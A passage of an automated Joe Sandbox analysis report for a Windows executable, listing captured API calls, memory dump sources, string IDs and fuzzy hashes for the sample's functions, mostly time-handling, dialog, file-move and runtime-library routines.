    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0005C830
    • SetWindowTextW.USER32(?,?), ref: 0005C841
    • GetDlgItem.USER32(?,00000065), ref: 0005C84A
    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0005C85E
    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0005C874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: MessageSend$Item$TextWindow$DialogParent
    • String ID: LICENSEDLG
    • API String ID: 4098686847-2177901306
    • Opcode ID: ddcc9b8d509bec2eb541352b6ed251d3de54b210f21484b632db93960b674659
    • Instruction ID: a85f3cc80ebb5eaa303435e278f1d4ce7084917c03a9f7d53d31bcb96177cdf5
    • Opcode Fuzzy Hash: ddcc9b8d509bec2eb541352b6ed251d3de54b210f21484b632db93960b674659
    • Instruction Fuzzy Hash: 8B219132244A057FF6115B65EC49FBB3AACFB4BB97F004019FA41E60A1CF6A98059A71
    APIs
    • _wcslen.LIBCMT ref: 0004B5E2
      • Part of subcall function 000526F1: GetSystemTime.KERNEL32(?), ref: 000526FF
      • Part of subcall function 000526F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 0005270D
      • Part of subcall function 0005269A: __aulldiv.LIBCMT ref: 000526A3
    • __aulldiv.LIBCMT ref: 0004B60E
    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B615
    • _swprintf.LIBCMT ref: 0004B640
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • _wcslen.LIBCMT ref: 0004B64A
    • _swprintf.LIBCMT ref: 0004B6A0
    • _wcslen.LIBCMT ref: 0004B6AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
    • String ID: %u.%03u
    • API String ID: 2956649372-1114938957
    • Opcode ID: 1bf1ff2a0c7ea057e2426e7d7ea1187b3acab79b2743b2026d6372e1b81a1715
    • Instruction ID: c6ed24032e72e23b1501f7765508a9cf8763fde14d0425c328d53e5937552800
    • Opcode Fuzzy Hash: 1bf1ff2a0c7ea057e2426e7d7ea1187b3acab79b2743b2026d6372e1b81a1715
    • Instruction Fuzzy Hash: 0C2181B2A083006FD714EF65CC85E9BB7ECEB94700F00493AF589D7242DB34DA0887A6
    APIs
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC2F
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC40
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC4E
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC5C
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC77
    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC9E
    • _swprintf.LIBCMT ref: 0005BCC4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
    • String ID: %s %s
    • API String ID: 385609497-2939940506
    • Opcode ID: f0215e77af40bafeb5ff647e82450f247bd9a44924a5192f5d3007d5170a3404
    • Instruction ID: 9c4cb6fe8e84faaf40fbd56d4df0f1967bb01144201ca82bf30d415aff4f8613
    • Opcode Fuzzy Hash: f0215e77af40bafeb5ff647e82450f247bd9a44924a5192f5d3007d5170a3404
    • Instruction Fuzzy Hash: 7921DBB294115CABEB11DFA0EC44EEF3BACFF59305F540026FA09D2111E768DA89CB61
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C43F,0004C441,00000000,00000000,2C2E0351,00000001,00000000,00000000,0004C32C,?,?,?,0004C43F,ROOT\CIMV2), ref: 00060F49
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C43F,?,00000000,00000000,?,?,?,?,?,0004C43F), ref: 00060FC4
    • SysAllocString.OLEAUT32(00000000), ref: 00060FCF
    • _com_issue_error.COMSUPP ref: 00060FF8
    • _com_issue_error.COMSUPP ref: 00061002
    • GetLastError.KERNEL32(80070057,2C2E0351,00000001,00000000,00000000,0004C32C,?,?,?,0004C43F,ROOT\CIMV2), ref: 00061007
    • _com_issue_error.COMSUPP ref: 0006101A
    • GetLastError.KERNEL32(00000000,?,0004C43F,ROOT\CIMV2), ref: 00061030
    • _com_issue_error.COMSUPP ref: 00061043
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
    • String ID:
    • API String ID: 1353541977-0
    • Opcode ID: b4230cf3ea02df08ca09426bd182ffc4aba4b8931646e0f8f545e469011b43ec
    • Instruction ID: ab5650f40d647887946976012fe849dbcece810b538e27cac83f22464f800346
    • Opcode Fuzzy Hash: b4230cf3ea02df08ca09426bd182ffc4aba4b8931646e0f8f545e469011b43ec
    • Instruction Fuzzy Hash: 29413A71A40215ABDB10DFA8DC45BEFBBEAFF48710F104229F509E7281D77998408BA5
    APIs
    • _wcslen.LIBCMT ref: 0005E8EE
    • ShowWindow.USER32(?,00000000), ref: 0005EA5D
    • GetExitCodeProcess.KERNEL32(?,?), ref: 0005EA99
    • CloseHandle.KERNEL32(?), ref: 0005EABF
    • ShowWindow.USER32(?,00000001), ref: 0005EB21
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
    • String ID: .exe$.inf
    • API String ID: 783751319-3750412487
    • Opcode ID: 663ecbb70e172d5dd4d2dfd63aecc4c4e4088ab6c71ea83aa75813f537d6369a
    • Instruction ID: e83fd067537da3b89e57bf63d62ca145c77bdb4b8ab25e5e51b171db3365d2c6
    • Opcode Fuzzy Hash: 663ecbb70e172d5dd4d2dfd63aecc4c4e4088ab6c71ea83aa75813f537d6369a
    • Instruction Fuzzy Hash: 8251F1355087C0AAFB749B20D804ABB7BE5BF81746F04482DFDC597191EB749A8CCB52
    APIs
    • __EH_prolog.LIBCMT ref: 0004A5EE
    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0004A611
    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0004A630
      • Part of subcall function 0004D6A7: _wcslen.LIBCMT ref: 0004D6AF
      • Part of subcall function 00053306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0004D523,00000000,.exe,?,?,00000800,?,?,?,00059E4C), ref: 0005331C
    • _swprintf.LIBCMT ref: 0004A6CC
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • MoveFileW.KERNEL32(?,?), ref: 0004A73B
    • MoveFileW.KERNEL32(?,?), ref: 0004A77B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
    • String ID: rtmp%d
    • API String ID: 3726343395-3303766350
    • Opcode ID: f63162fa69fdcd92c43d0a6848c636eeb7dce7224fe6f3703be9947acf6cf48e
    • Instruction ID: 7f49a09b63601bf1aeecd4b35d0eff8cc0dfebd9137e1599f5ab3a0c7266ce0b
    • Opcode Fuzzy Hash: f63162fa69fdcd92c43d0a6848c636eeb7dce7224fe6f3703be9947acf6cf48e
    • Instruction Fuzzy Hash: F64180B1A441296ACF20ABA0CC44EEF73BCBF46341F0404B9B545E3046DB388A85CF69
    APIs
    • __aulldiv.LIBCMT ref: 0005253E
      • Part of subcall function 0004C619: GetVersionExW.KERNEL32(?), ref: 0004C63E
    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00052561
    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00052573
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00052584
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052594
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000525A4
    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000525DF
    • __aullrem.LIBCMT ref: 00052689
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
    • String ID:
    • API String ID: 1247370737-0
    • Opcode ID: a8eed178778442eb5165893b371615aa859fdbb9fdabdc4f32f1ab022f33731e
    • Instruction ID: 508180a38eece28a6bf78bee4be606e738a2f9255e44ab4e548949ea362e062e
    • Opcode Fuzzy Hash: a8eed178778442eb5165893b371615aa859fdbb9fdabdc4f32f1ab022f33731e
    • Instruction Fuzzy Hash: DC4148B15083059FD710DF65C88496BBBF9FF88315F40892EF99AD2210E738E589CB62
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: </p>$</style>$<br>$<style>$>
    • API String ID: 176396367-3568243669
    • Opcode ID: 4ac53ff8cd6c0858da51ca24d08b50c67a8ae5cb5b2e64d6f54319a6d9a00621
    • Instruction ID: 3866175c9edcc6dfa271e0afe576a351634733daf6fa840d08473c93488ad375
    • Opcode Fuzzy Hash: 4ac53ff8cd6c0858da51ca24d08b50c67a8ae5cb5b2e64d6f54319a6d9a00621
    • Instruction Fuzzy Hash: D451272674032395DB706A145C127B773F0DF62793F68462BFD828B5C0FBA58D898272
    APIs
    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00070FB2,00000000,00000000,00000000,00000000,00000000,?), ref: 0007087F
    • __fassign.LIBCMT ref: 000708FA
    • __fassign.LIBCMT ref: 00070915
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0007093B
    • WriteFile.KERNEL32(?,00000000,00000000,00070FB2,00000000,?,?,?,?,?,?,?,?,?,00070FB2,00000000), ref: 0007095A
    • WriteFile.KERNEL32(?,00000000,00000001,00070FB2,00000000,?,?,?,?,?,?,?,?,?,00070FB2,00000000), ref: 00070993
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID:
    • API String ID: 1324828854-0
    • Opcode ID: 53d87c3305e0bbf91ca262887492e12afb633ebfa66c80e7cfc3e13adf061b38
    • Instruction ID: 05b3c34d393161d3922ca63100e4fd26edeb6238b289bab333b6252eadd17539
    • Opcode Fuzzy Hash: 53d87c3305e0bbf91ca262887492e12afb633ebfa66c80e7cfc3e13adf061b38
    • Instruction Fuzzy Hash: 1D515F71E00249DFEB10CFA8D885BEEBBF4EB09310F14821AE659F7252D7789941CB65
    APIs
    • _ValidateLocalCookies.LIBCMT ref: 00063AB7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 00063ABF
    • _ValidateLocalCookies.LIBCMT ref: 00063B48
    • __IsNonwritableInCurrentImage.LIBCMT ref: 00063B73
    • _ValidateLocalCookies.LIBCMT ref: 00063BC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: 87846964c39529bf45bf37968e462aa8e08c5d891b4da225b6fb93acc21ec567
    • Instruction ID: 87f4c8962fcb684cd6962a9b01ee31f65b579633c69cab157ebb28657e020fdf
    • Opcode Fuzzy Hash: 87846964c39529bf45bf37968e462aa8e08c5d891b4da225b6fb93acc21ec567
    • Instruction Fuzzy Hash: 7F41D034E00208ABCF50DF68C884A9EBBF6AF05324F148155EA18AB393D735AF55CBD1
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
    • API String ID: 176396367-3743748572
    • Opcode ID: 302307eaca0162043736284656ea87a2a6b9bd4d97c03644c75f21418c3cf99d
    • Instruction ID: 1fac199470d0279d25d7a2c688b6d7f2c4eb440103c8c24305322ba309cae35b
    • Opcode Fuzzy Hash: 302307eaca0162043736284656ea87a2a6b9bd4d97c03644c75f21418c3cf99d
    • Instruction Fuzzy Hash: F431402274470166EA34AB549C42BBB73E5EB91321F60852EFD59572C1FBA4AC48C3A3
    APIs
      • Part of subcall function 0006DA18: _free.LIBCMT ref: 0006DA41
    • _free.LIBCMT ref: 0006DAA2
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006DAAD
    • _free.LIBCMT ref: 0006DAB8
    • _free.LIBCMT ref: 0006DB0C
    • _free.LIBCMT ref: 0006DB17
    • _free.LIBCMT ref: 0006DB22
    • _free.LIBCMT ref: 0006DB2D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction ID: 24f824784d7310c97104dd2fc1c3ca25e1d0da9311aa03dc709b945aaf4aebcc
    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction Fuzzy Hash: C3112E71F48B04BAD620BBB0CC0BFCB779EAF15700F444C16B29AB6053DA65B5058BA2
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0005F7E5,0005F748,0005F9E9), ref: 0005F781
    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0005F797
    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0005F7AC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
    • API String ID: 667068680-1718035505
    • Opcode ID: b16aedaa0dc6ba972cafac423753559fba519e5e908f1c65b1a14117000d9b41
    • Instruction ID: 6bd9bd7c68369f7cc13dcd55c5239e017ca353d5338ae2b025fbc63d4ff25e99
    • Opcode Fuzzy Hash: b16aedaa0dc6ba972cafac423753559fba519e5e908f1c65b1a14117000d9b41
    • Instruction Fuzzy Hash: 07F02231B4962B9BAB704EA46C8497B62CC8F0E3533200939EE09E3604E32CCD8846D0
    APIs
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000527E1
      • Part of subcall function 0004C619: GetVersionExW.KERNEL32(?), ref: 0004C63E
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00052805
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005281F
    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00052832
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052842
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052852
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion
    • String ID:
    • API String ID: 2092733347-0
    • Opcode ID: 30f38469fbebddc0869c30a23240de2204fcaa256b558b1fdd47cbeb84148659
    • Instruction ID: fc5ab45a857f5c599bb7352a6e9d68a0074dafa4dab8bcd22b66536ec5ba786d
    • Opcode Fuzzy Hash: 30f38469fbebddc0869c30a23240de2204fcaa256b558b1fdd47cbeb84148659
    • Instruction Fuzzy Hash: AA311775108306AFC704DFA8D88499BB7E8FF98704F444A2EF999D3210E734D589CBA6
    APIs
    • GetLastError.KERNEL32(?,?,00063C71,00063A2C,00060BE4), ref: 00063C88
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00063C96
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063CAF
    • SetLastError.KERNEL32(00000000,00063C71,00063A2C,00060BE4), ref: 00063D01
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: c81459ab4b61de4797d11716e35fd6ecee766371275467becb56b20ae7b96200
    • Instruction ID: 76ab15084442c2c2d2254d2cf4c9db706376bc9f283ce530c0a15a21efc21008
